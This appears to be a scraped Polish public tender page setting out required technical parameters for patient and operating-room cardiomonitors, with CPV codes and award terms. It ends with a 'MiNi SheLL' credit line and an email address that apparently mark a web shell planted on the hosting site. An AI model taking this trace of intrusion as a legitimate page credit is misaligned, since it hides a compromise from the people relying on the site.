2.		Monitor o wadze maks. 6 kg z akumulatorami	TAK	
3.		W obudowie rączka umożliwiająca przenoszenie i zawieszenie monitora na szczycie łóżka	TAK	
4.		Przekątna ekranu min. 10	TAK	
5.		Typ ekranu kolorowy LCD TFT o rozdzielczości min. 800 x 600	TAK	
6.		3. stopniowy układ alarmowy dla wszystkich monitorowanych parametrów	TAK	
7.		Ustawianie wszystkich granic alarmowych i czasu wyciszenia alarmu w jednym wspólnym menu. Dopuszcza się automatyczne ustawianie granic.	TAK	
8.		Ilość kanałów dynamicznych min. 6	TAK	
9.		Trendy tabelaryczne i graficzne wszystkich parametrów z min. 96 h	TAK	
10.		Funkcja wyświetlania krótkich odcinków trendów (ostatnie 1 lub 2 godz.) obok odpowiadających im krzywych dynamicznych.
Wyświetlanie min. 5 ostatnich pomiarów ciśnienia krwi na ekranie z krzywymi dynamicznymi	TAK	
11.		Programowanie wyświetlania krzywych dynamicznych wraz z wartościami cyfrowymi i ekranu dużych cyfr	TAK	
12.		Funkcja obliczania dawkowania leków (kalkulator lekowy)	TAK	
13.		Zapamiętywanie min. 50 odcinków krzywych dynamicznych związanych z sytuacjami alarmowymi	TAK	
14.		Zasilanie monitora 230V50Hz	TAK	
15.		Złącze zasilania prądem stałym z instalacji w karetce	TAK	
16.		Wewnętrzne zasilanie akumulatorowe na co najmniej 2 h pracy	TAK	
17.		Akumulator wymienialny przez użytkownika bez rozkręcania monitora	TAK	
18.		Instrukcja w języku polskim, w formie elektronicznej ( na CD) załączona do oferty	TAK	
19.		Komunikaty na ekranie w języku polskim, obsługa przy pomocy pokrętła i przycisków funkcyjnych ( nie dopuszcza się ekranu dotykowego)	TAK	
20.		Możliwość rozbudowy o 12. odprowadzeniowe EKG, inwazyjny pomiar ciśnienia, drukarkę, analizator gazów	TAK	
Pomiar EKG ST RESP - dla 2. monitorów
21.		Pomiar częstości pracy serca w zakresie co najmniej 20 do 250 B/min	TAK	
22.		Pomiar częstości oddechu w zakresie co najmniej od 6 od 120 R min	TAK	
23.		Analiza odchylenia odcinka ST z min 2. odprowadzeń EKG	TAK	
24.		Analiza arytmii , min. 10 kategorii wykrywanych zaburzeń rytmu 	TAK	
25.		Ustawianie granic alarmowych częstości akcji serca, odchylenia odcinka ST, częstości oddechu oraz czasu trwania bezdechu	TAK	
26.		Przewód EKG z 5. końcówkami EKG, funkcja automatycznej zmiany wybranego odprowadzenia w przypadku odklejenia się jeden z aktywnych elektrod.
Odłączane pojedynczo końcówki - możliwość używania tylko 3. odprowadzeń 	TAK	
Pomiar ciśnienia metodą nieinwazyjną - dla 2. monitorów
27.		Wyświetlanie wartości ciśnień skurczowego, rozkurczowego i średniego	TAK	
28.		Ustawianie granic alarmowych ciśnienia skurczowego, rozkurczowego i średniego	TAK	
29.		Tryb pracy ręczny 	TAK	
30.		Tryb pracy automatyczny - przedziały czasowe pomiaru co najmniej od 3 do 360 minut	TAK	
31.		Funkcja umożliwiająca pomiar ciśnienia krwi i pulsoksymetrii na jednej ręce bez wywoływania alarmu SpO2 podczas ucisku mankietu	TAK	
32.		Zestaw mankietów wielorazowych: dla dorosłych duży i średni. Przewód łączący mankiet z modułem. 	TAK	
Pomiar saturacji i pletyzmografia - dla 1. monitora
33.		Wyświetlanie krzywej pletyzmograficznej oraz wartości saturacji i częstości pulsu	TAK	
34.		Dźwięk sygnalizujący wykrycie pulsu o zmiennej głośności zależnie od wartości saturacji	TAK	
35.		Ustawianie granic alarmowych % saturacji oraz częstości pulsu	TAK	
36.		Czujnik pomiarowy wielorazowy, dla dorosłych i dzieci,  na palec.	TAK	
Pomiar saturacji i pletyzmografia - dla 1. monitora
37.		Pomiar w technologii OxiMax lub równoważnej		
38.		Wyświetlanie krzywej pletyzmograficznej oraz wartości saturacji i częstości pulsu	TAK	
39.		Ustawianie granic alarmowych % saturacji oraz częstości pulsu	TAK	
40.		Czujnik pomiarowy wielorazowy, dla dorosłych i dzieci,  na palec, czujnik typu Y, kabel połączeniowy	TAK	
Pomiar temperatury, 2 kanały - dla 2. monitorów
41.		Wyświetlanie wartości temperatury ciała 	TAK	
42.		Ustawianie granic alarmowych temperatury ciała, temperatury różnicowej	TAK	
43.		Czujnik temperatury powierzchniowy, wielorazowy	TAK	
Pomiar kapnografii - dla 1. monitora
44.		Pomiar kapnografii w technologii Microstream TAK	
45.		Pomiar częstości oddechu w zakresie co najmniej 5-150 R min	TAK	
46.		Pomiar stężenia CO2 w zakresie co najmniej 0-99 mmHg	TAK	
47.		Zestaw akcesoriów, minimum: 5 linii pomiarowych dla dorosłych i 2 linie dla niemowląt	TAK	
Dodatkowe wyposażenie
48.		Zestaw mankietów dla niemowląt 6 szt. w 3 różnych rozmiarach. Przewód łączący mankiet z modułem.	TAK	
49.		Mankiet pediatryczny - 1 szt.	TAK	
50.		Uchwyt do montażu monitora na ścianie z możliwością regulacji obrotu i nachylenia, z koszykiem na akcesoria - 2 szt.
Możliwość zdjęcia monitora  bez użycia narzędzi	TAK	
Nie spełnianie wyżej wymienionych warunków powoduje odrzucenie oferty.

Pakiet III  pozycja 3: Kardiomonitor na sale operacyjną sztuk 1.
Producent: 
Urządzenie typ: 
Kraj pochodzenia: 
Rok produkcji: 2010 r.

L. p.	Minimalne wymagane parametry techniczne	Parametry  wymagane	Oferowane parametry techniczne
1.		Monitor przystosowany do pracy w standardowej sieci komputerowej	TAK	
2.		Modułowa budowa systemu - możliwość przenoszenia przez użytkownika (bez udziału serwisu) modułów pomiarowych wszystkich wymaganych parametrów	TAK	
3.		Kolorowy ekran LCD TFT o przekątnej co najmniej 12, zintegrowany w jednej obudowie z jednostką centralną i z miejscami parkingowymi na moduły pomiarowe wszystkich wymaganych parametrów,	TAK	
4.		3. stopniowy układ alarmowy dla wszystkich monitorowanych parametrów	TAK	
5.		Ustawianie wszystkich granic alarmowych i czasu wyciszenia alarmu w jednym wspólnym menu. Dopuszcza się automatyczne ustawianie granic.	TAK	
6.		Minimum 8 kanałów dynamicznych	TAK	
7.		Funkcja wyświetlania krótkich odcinków trendów (ostatnie 1 lub 2 godz.) obok odpowiadających im krzywych dynamicznych	TAK	
8.		Komunikacja z użytkownikiem w języku polskim	TAK	
9.		Obsługa przy pomocy pokrętła i przycisków funkcyjnych	TAK	
10.		Trendy tabelaryczne i graficzne wszystkich mierzonych parametrów z minimum 12 h	TAK	
11.		Zapamiętywanie wszystkich krzywych dynamicznych w czasie rzeczywistym (full disclosure) z minimum 3 h	TAK	
12.		Zapamiętywanie odcinków krzywych dynamicznych związanych z minimum 50. ostatnimi sytuacjami alarmowymi	TAK	
13.		Zasilanie monitora 230V 50Hz	TAK	
14.		Zasilanie akumulatorowe wbudowane w monitor na minimum 1 h pracy	TAK	
15.		Możliwość rozbudowy systemu monitorowania o: inwazyjny pomiar ciśnienia (3,4 kanał), analizę gazów anestetycznych, pomiar rzutu minutowego metodą termodylucji, pomiar stopnia uśpienia BIS, ciągły inwazyjny pomiar rzutu minutowego (CCO firmy Edwards lub PICCO firmy Pulsion)	TAK	
Pomiar EKG/ST/Arytmia/Resp
16.		7-odprowadzeniowe EKG - przewód EKG z 5 odłączanymi osobno końcówkami EKG	TAK	
17.		Funkcja automatycznej zmiany wybranego odprowadzenia w przypadku odklejenia się jeden z aktywnych elektrod.	TAK	
18.		Pomiar częstości pracy serca w zakresie co najmniej 20 do 250 B/min	TAK	
19.		Pomiar częstości oddechu w zakresie co najmniej od 6 od 120 R/min	TAK	
20.		Analiza odchylenia odcinka ST z wszystkich odprowadzeń	TAK	
21.		Analiza arytmii  - minimum 10 wykrywanych kategorii zaburzeń rytmu	TAK	
22.		Ustawianie granic alarmowych częstości akcji serca, odchylenia odcinka ST, częstości oddechu oraz czasu trwania bezdechu	TAK	
Pomiar ciśnienia metodą nieinwazyjną
23.		Wyświetlanie wartości ciśnień skurczowego, rozkurczowego i średniego	TAK	
24.		Ustawianie granic alarmowych ciśnienia skurczowego, rozkurczowego i średniego	TAK	
25.		Tryb pracy ręczny	TAK	
26.		Tryb pracy automatyczny - odstępy pomiarowe co najmniej od 3 do 120 minut	TAK	
27.		Mankiety dla dorosłych: średni, duży, mały.  Przewód łączący mankiet z modułem	TAK	
Pomiar saturacji i pletyzmografia
28.		Wyświetlanie krzywej pletyzmograficznej oraz wartości saturacji i częstości pulsu	TAK	
29.		Dźwięk sygnalizujący wykrycie pulsu o zmiennej charakterystyce zależnej od wartości saturacji	TAK	
30.		Ustawianie czułości pomiaru saturacji	TAK	
31.		Funkcja umożliwiająca pomiar ciśnienia krwi i pulsoksymetrii na jednej ręce bez wywoływania alarmu SpO2 podczas ucisku mankietu	TAK	
32.		Ustawianie granic alarmowych %saturacji oraz częstości pulsu	TAK	
33.		Czujnik pomiarowy dla dzieci i dorosłych na palec z kablem połączeniowym	TAK	
Pomiar temperatury (dwa kanały)
34.		Pomiar wartości temperatur w dwóch punktach ciała	TAK	
35.		Wyświetlanie wartości temperatury różnicowej	TAK	
36.		Ustawianie granic alarmowych temperatur ciała i różnicowej	TAK	
37.		Czujniki temperatury: powierzchniowy i centralny.	TAK	
Pomiar ciśnienia inwazyjnego (dwa kanały) 
38.		Wyświetlanie krzywych oraz wartości ciśnienia skurczowego, rozkurczowego i średniego	TAK	
39.		Możliwość wyboru etykiet dla wyświetlanych krzywych ciśnienia	TAK	
40.		Kabel połączeniowy - 2 szt., zestaw mocujący oraz 10 linii pomiarowych 	TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.10-7, 33.17.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com